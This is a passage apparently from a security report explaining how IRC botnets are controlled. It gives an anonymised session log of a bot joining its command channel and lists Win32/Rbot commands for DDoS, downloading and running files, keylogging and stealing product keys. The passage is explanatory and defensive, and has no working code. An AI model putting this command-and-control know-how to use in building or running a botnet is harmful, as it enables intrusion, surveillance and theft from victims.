Controlling the Botnet
After a bot infects a computer, it attempts to contact its C&C server for instructions. A typical communication that can be observed after a successful infection might look like the following excerpt:
<- :irc.XXX.XXX NOTICE AUTH :*** Looking up your hostname...
<- :irc.XXX.XXX NOTICE AUTH :*** Found your hostname
-> PASS s3rv3rp455
-> NICK [d1f]-511202
-> USER hlxahl 0 0 :hlxahl
<- :irc.XXX.XXX NOTICE [d1f]-511202 :*** If you are having problems connecting due to ping timeouts, please type /quote pong SF125722 or /raw pong SF125722 now.
<- PING :SF125722
-> PONG :SF125722
<- :irc.XXX.XXX 001 [d1f]-511202 :Welcome to the irc.XXX.XXX IRC Network [d1f]-511202!hlxahl@heh
<- :irc.XXX.XXX 002 [d1f]-511202 :Your host is irc.XXX.XXX, running version Unreal3.2.7
<- :irc.XXX.XXX 003 [d1f]-511202 :This server was created Mon Sep 10 2007 at 20:30:33 PDT
<- :irc.XXX.XXX 004 [d1f]-511202 irc.XXX.XXX Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
After connecting, the bot tries to join the operatorâ€™s channel as configured:
-> JOIN #[d1f] channelpassword
-> MODE [d1f]-511202 +iwx
If the topic does not contain any instructions for the bot it remains idle in the channel, awaiting commands.
To control the bots, bot-herders enter the channel like ordinary IRC users and issue specially formatted commands. With some commands, such as commands to collect and report information about the victimâ€™s computer, the bots report their results as chat messages within the IRC channel, or save them locally as files that the herder can retrieve later. Depending on the capabilities of the bot malware, bot-herders can execute a wide range of actions, as described in "How Botnets Are Used.â€. A brief selection of typical botnet commands, in this case from the Win32/Rbot family, provides an idea of the kinds of operations a herder can execute:
- .capture. Generates and saves an image or video file. Depending on the parameters used, this file could be a screenshot of the victimâ€™s desktop or a still image or video from the victimâ€™s webcam. The operator can recover the saved picture using the .get command.
- .ddos.syn, .ddos.ack, .ddos.random. Launches a DDoS attack on a specified IP address for a specified length of time.
- .download. Downloads a file from a specified URL to the victimâ€™s computer and optionally executes it.
- .findfile. Searches for files on the victimâ€™s computer by name and returns the paths of any files found.
- .getcdkeys. Returns product keys for software installed on the victimâ€™s computer.
- .keylog. Logs the victimâ€™s keystrokes and saves them to a file.
- .login, .logout. Authenticates the bot-herder with the bots. Before issuing commands to any bots in the channel, the bot-herder must use the .login command with a password that is specified in the botsâ€™ configuration data so the bots will recognize the bot-herder as an authorized controller.
- .open. Opens a program, an image, or a URL in a web browser.
- .procs. Lists the processes running on the victimâ€™s computer. Other commands can then be used to kill processes by name or ID.